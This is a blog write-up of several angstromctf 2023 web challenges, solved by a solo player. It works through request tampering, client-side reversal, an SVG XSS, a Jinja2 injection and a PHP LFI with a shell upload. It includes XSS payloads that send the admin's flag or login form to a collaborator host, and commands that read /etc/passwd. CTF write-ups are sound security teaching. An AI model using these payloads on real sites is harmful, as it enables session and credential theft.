angstromctf 2023 - WEB

Posted on 02 May 2023 in security • 7 min read

angstromctf 2023

I participated as a solo player to angstromctf 2023. I focused on Web challenges.

catch me if you can

  • 10 points
  • 1150 solves

Very simple, sanity check challenge. View source:

            body {
                font-family: "Comic Sans MS", "Comic Sans", cursive;
            #flag {
                border: 2px solid red;
                position: absolute;
                top: 50%;
                left: 0;
                -moz-user-select: -moz-none;
                -khtml-user-select: none;
                -webkit-user-select: none;
                -ms-user-select: none;
                user-select: none;

                animation-name: spin;
                animation-duration: 3000ms;
                animation-iteration-count: infinite;
                animation-timing-function: linear;

            @keyframes spin {
                from {
                to {
        <h1>catch me if you can!</h1>
        <marquee scrollamount="50" id="flag">actf{y0u_caught_m3!_0101ff9abc2a724814dfd1c85c766afc7fbd88d2cdf747d8d9ddbf12d68ff874}</marquee>

Celeste Speedrunning Association

  • 20 points
  • 681 solves

We need to beat a speed run time. Meaning we can start in the future and have a negative run time. Just modify the start date of the going request:

POST /submit HTTP/1.1
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.23.3
Date: Thu, 26 Apr 2023 17:24:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52
Connection: close

you win the flag: actf{wait_until_farewell_speedrun}


  • 40 points
  • 770 solves

We have a login form with a JavaScript validation. The flag is the password.

const swap = (x) => {
    let t = x[0]
    x[0] = x[3]
    x[3] = t

    t = x[2]
    x[2] = x[1]
    x[1] = t

    t = x[1]
    x[1] = x[3]
    x[3] = t

    t = x[3]
    x[3] = x[2]
    x[2] = t

    return x

const chunk = (x, n) => {
    let ret = []

    for(let i = 0; i < x.length; i+=n){

    return ret

const check = (e) => {
    if (document.forms[0].username.value === "admin"){
        if(swap(chunk(document.forms[0].password.value, 30)).join("") == "7e08250c4aaa9ed206fd7c9e398e2}actf{cl1ent_s1de_sucks_544e67ef12024523398ee02fe7517fffa92516317199e454f4d2bdb04d9e419ccc7"){
            document.getElementById("msg").style.display = "block"

The input password was passed to the chunk function and then to the swap function. The result needed to be 7e08250c4aaa9ed206fd7c9e398e2}actf{cl1ent_s1de_sucks_544e67ef12024523398ee02fe7517fffa92516317199e454f4d2bdb04d9e419ccc7.

The chunk function just cut the 120 characters password into four 30 characters pieces.

The swap function swap the different chunk in the following manner: 0123 → 3120 → 3210 → 3012 → 3021

Knowing that we could find that the flag was (I left space between the chunk for clarity): actf{cl1ent_s1de_sucks_544e67e 6317199e454f4d2bdb04d9e419ccc7 f12024523398ee02fe7517fffa9251 7e08250c4aaa9ed206fd7c9e398e2}


  • 40 points
  • 806 solves

There was around 5 000 directories and only one contained the flag. I used wget -r -np -k to recursively download the site (this took time, but I did not care as I was working on the next challenge during that time) and then used grep to find the flag.

➜  grep actf*{y0u_f0und_me_b51d0cde76739fa3}

Celeste Tunneling Association

  • 40 points
  • 566 solves

This was a simple website and the code source was provided.

# run via `uvicorn app:app --port 6000`
import os

SECRET_SITE = b"flag.local"
FLAG = os.environ['FLAG']

async def app(scope, receive, send):
    assert scope['type'] == 'http'

    headers = scope['headers']

    await send({
        'type': 'http.response.start',
        'status': 200,
        'headers': [
            [b'content-type', b'text/plain'],

    # IDK malformed requests or something
    num_hosts = 0
    for name, value in headers:
        if name == b"host":
            num_hosts += 1

    if num_hosts == 1:
        for name, value in headers:
            if name == b"host" and value == SECRET_SITE:
                await send({
                    'type': 'http.response.body',
                    'body': FLAG.encode(),

    await send({
        'type': 'http.response.body',
        'body': b'Welcome to the _tunnel_. Watch your step!!',

Looking at the source code we understood that we needed one host header with the value flag.local. Using burp we modified the request to look like the following and got the flag in the response.

Host: flag.local
HTTP/2 200 OK
Content-Type: text/plain
Date: Thu, 26 Apr 2023 18:07:54 GMT
Server: uvicorn



  • 80 points
  • 243 solves

We could generate cards and shared them via the site. There was also an admin app that simulated the administrator behavior and would browse card we sent it.

  app
    static
      ﰟ cake.svg
      ﰟ flowers.svg
      ﰟ heart.svg
      ﰟ snowman.svg
    󰡨 Dockerfile
     index.html
     index.js
     package-lock.json
     package.json

The app was pretty straightforward and consisted mostly of the index.js file.

const express = require("express");
const bodyParser = require("body-parser");
const cookieParser = require("cookie-parser");
const path = require("path");
const { v4: uuidv4, v4 } = require("uuid");
const fs = require("fs");

const app = express();
app.use(bodyParser.urlencoded({ extended: true }));

const IMAGES = {
    heart: fs.readFileSync("./static/heart.svg"),
    snowman: fs.readFileSync("./static/snowman.svg"),
    flowers: fs.readFileSync("./static/flowers.svg"),
    cake: fs.readFileSync("./static/cake.svg")


const port = Number(process.env.PORT) || 8080;
const secret = process.env.ADMIN_SECRET || "secretpw";
const flag = process.env.FLAG || "actf{placeholder_flag}";

const cards = Object.create(null);

app.use('/static', express.static('static'))

app.get("/card", (req, res) => {
    if ( && cards[]) {
        res.setHeader("Content-Type", cards[].type);
    } else {
        res.send("bad id");
});"/card", (req, res) => {
    let { svg, content } = req.body;

    let type = "text/plain";
    let id = v4();

    if (svg === "text") {
        type = "text/plain";
        cards[id] = { type, content }
    } else {
        type = "image/svg+xml";
        cards[id] = { type, content: IMAGES[svg] }

    res.redirect("/card?id=" + id);

app.put("/card", (req, res) => {
    let { id, type, svg, content } = req.body;

    if (!id || !cards[id]){
        res.send("bad id");

    cards[id].type = type == "image/svg+xml" ? type : "text/plain";
    cards[id].content = type === "image/svg+xml" ? IMAGES[svg || "heart"] : content;


// the admin bot will be able to access this
app.get("/flag", (req, res) => {
    if (req.cookies && req.cookies.secret === secret) {
    } else {
        res.send("you can't view this >:(");

app.get("/", (req, res) => {
    res.sendFile(path.join(__dirname, "index.html"));

app.listen(port, () => {
    console.log(`Server listening on port ${port}.`);

There were three actions for the card endpoint:

  • GET: required the get parameter id and would display the card if the id existed.
  • POST: generated a card, the action used by the site when generating a card
  • PUT: this method was never used on the site directly but could be used manually to edit a card

We generated an SVG card using the application user interface (this used the /card POST method).

POST /card HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21


The response contained our card ID.

HTTP/1.1 302 Found
Server: nginx/1.23.3
Date: Thu, 26 Apr 2023 19:29:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 67
Connection: keep-alive
X-Powered-By: Express
Location: /card?id=eb184d2d-6ae9-416d-adb4-6f89afca7e74
Vary: Accept

Found. Redirecting to /card?id=eb184d2d-6ae9-416d-adb4-6f89afca7e74

We modified the card using the PUT method. In order to keep the Content-Type as image/svg+xml we needed to take advantage of the loose comparison cards[id].type = type == "image/svg+xml" ? type : "text/plain"; using type[]=image/svg%2bxml. We also included an SVG file containing a XSS payload (a simple alert('XSS') for now).

PUT /card HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1601


The XSS was triggered when browsing the card: XSS triggered

We craft a payload that will request the flag and send it to a Burp collaborator: fetch('/flag').then(flag=>flag.text()).then(flag => fetch('https://burp.collaborator/'+flag))

We modify the SVG file:

PUT /card HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1713


We verified that our payload was working and got an interaction /you%20can't%20view%20this%20%3E:(?p0wu1=1 on our collaborator instance.

Then, we sent our card to the admin and got the flag as a collaborator interaction:

`GET /actf%7Bthe_adm1n_has_rece1ved_y0ur_card_cefd0aac23a38d33%7D HTTP/1.1


  • 110 points
  • 167 solves

The application was an authentication form with an impossible login. As the previous challenge an administrator is simulated with a web page. Below is the JavaScript for the admin bot:

module.exports = {
    name: "brokenlogin",
    timeout: 7000,
    async execute(browser, url) {
        if (!/^https:\/\/brokenlogin\.web\.actf\.co\/.*/.test(url)) return;

        const page = await browser.newPage();

        await page.goto(url);
        await page.waitForNetworkIdle({
            timeout: 5000,

        await page.waitForSelector("input[name=username]");

        await page.$eval(
          (el) => (el.value = "admin")

        await page.waitForSelector("input[name=password]");

        await page.$eval(
          (el, password) => (el.value = password),


        await new Promise((r) => setTimeout(r, 1000));

        await page.close();

Looking at the source code we noticed that a Flask Jinja template is used to build the page. In addition, it is possible to add a custom failure message using a GET parameter message.

from flask import Flask, make_response, request, escape, render_template_string

app = Flask(__name__)

fails = 0

indexPage = """
        <title>Broken Login</title>
        <p style="color: red; fontSize: '28px';">%s</p>
        <p>Number of failed logins: {{ fails }}</p>
        <form action="/" method="POST">
            <label for="username">Username: </label>
            <input id="username" type="text" name="username" /><br /><br />

            <label for="password">Password: </label>
            <input id="password" type="password" name="password" /><br /><br />

            <input type="submit" />

def index():
    global fails
    custom_message = ""

    if "message" in request.args:
        if len(request.args["message"]) >= 25:
            return render_template_string(indexPage, fails=fails)

        custom_message = escape(request.args["message"])

    return render_template_string(indexPage % custom_message, fails=fails)"/")
def login():
    global fails
    fails += 1
    return make_response("wrong username or password", 401)

if __name__ == "__main__":"")

For instance would display aa at the beginning of the page (in red). This parameter is interpreted as a Jinja2 input and 7*7 would result in 49. We could also use{{%20config.items()%20}} to retrieve the configuration.

dict_items([('ENV', 2), ('DEBUG', False), ('TESTING', False), ('PROPAGATE_EXCEPTIONS', None), ('SECRET_KEY', None), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(days=31)), ('USE_X_SENDFILE', False), ('SERVER_NAME', None), ('APPLICATION_ROOT', '/'), ('SESSION_COOKIE_NAME', 'session'), ('SESSION_COOKIE_DOMAIN', None), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_HTTPONLY', True), ('SESSION_COOKIE_SECURE', False), ('SESSION_COOKIE_SAMESITE', None), ('SESSION_REFRESH_EACH_REQUEST', True), ('MAX_CONTENT_LENGTH', None), ('SEND_FILE_MAX_AGE_DEFAULT', None), ('TRAP_BAD_REQUEST_ERRORS', None), ('TRAP_HTTP_EXCEPTIONS', False), ('EXPLAIN_TEMPLATE_LOADING', False), ('PREFERRED_URL_SCHEME', 'http'), ('JSON_AS_ASCII', None), ('JSON_SORT_KEYS', None), ('JSONIFY_PRETTYPRINT_REGULAR', None), ('JSONIFY_MIMETYPE', None), ('TEMPLATES_AUTO_RELOAD', None), ('MAX_COOKIE_SIZE', 4093), ('g', Undefined), ('a', 2), ('x', 13), ('aa', 1), ('add', 1), ('z', 2), (6, 9), ('q', 2)])

We were limited by a length check and our custom message could not be more than 25 characters. But using Jinja2 filters in addition to requests parameters we were able to craft an XSS:{{request.args.a|safe}}&a=%3Cscript%3Ealert(1);%3C/script%3E

XSS triggered

We needed to retrieve and exhilarate the flag. But we also needed to wait for the form to be fully loaded. Using window.onload would achieve that. After a few try the final payload looked like this:{{request.args.a|safe}}&a=%3Cscript%3Ewindow.onload%20=function(){document.forms[0].action=%22};%3C/script%3E

Sending this link to the admin resulted in an interaction with our collaborator that disclosed the flag.




  • 180 points
  • 73 solves

This was a PHP file store service.

├── Dockerfile
├── list_uploads
├── make_abyss_entry
└── src
    ├── index.php
    └── uploads
        └── placeholder.txt

The main file was the PHP index:

        if ($_FILES["f"]["size"] > 1000) {
            echo "file too large";

        $i = uniqid();

        if (empty($_FILES["f"])){

        if (move_uploaded_file($_FILES["f"]["tmp_name"], "./uploads/" . $i . "_" . hash('sha256', $_FILES["f"]["name"]) . "_" . $_FILES["f"]["name"])){
            echo "upload success";
        } else {
            echo "upload error";
    } else {
        if (isset($_GET["f"])) {
            include "./uploads/" . $_GET["f"];


        // this doesn't work, so I'm commenting it out 😛
        // system("/list_uploads");

Note that we had an LFI and would return the content of /etc/passwd.

Uploading a file would result in it being renamed using the uniqid function. As notice in a big red box on the documentation this function just return the time in microseconds and must not be used for cryptographic purposes.

The final filename would be in the form time_sha256sum_filename.

We created a script that will upload a simple PHP shell and print the value of uniqid before and after the request.

import requests
import os

files = {'f': open('shell.php','rb')}

url = ''
os.system('php -r \'printf("uniqid(): %s\r\n", uniqid());\'')

r =, files=files)#, data=values)
os.system('php -r \'printf("uniqid(): %s\r\n", uniqid());\'')

It turned out that this was around 470k requests. It seemed too much to be bruteforce and there should be another way.

I did not solve this challenge

Meme-Lord, used ffuf to bruteforce it and you can find the followup of the challenge in his writeup

Another method was to use pearcmd.php. This method is also detailed here (gist) and here (hacktricks).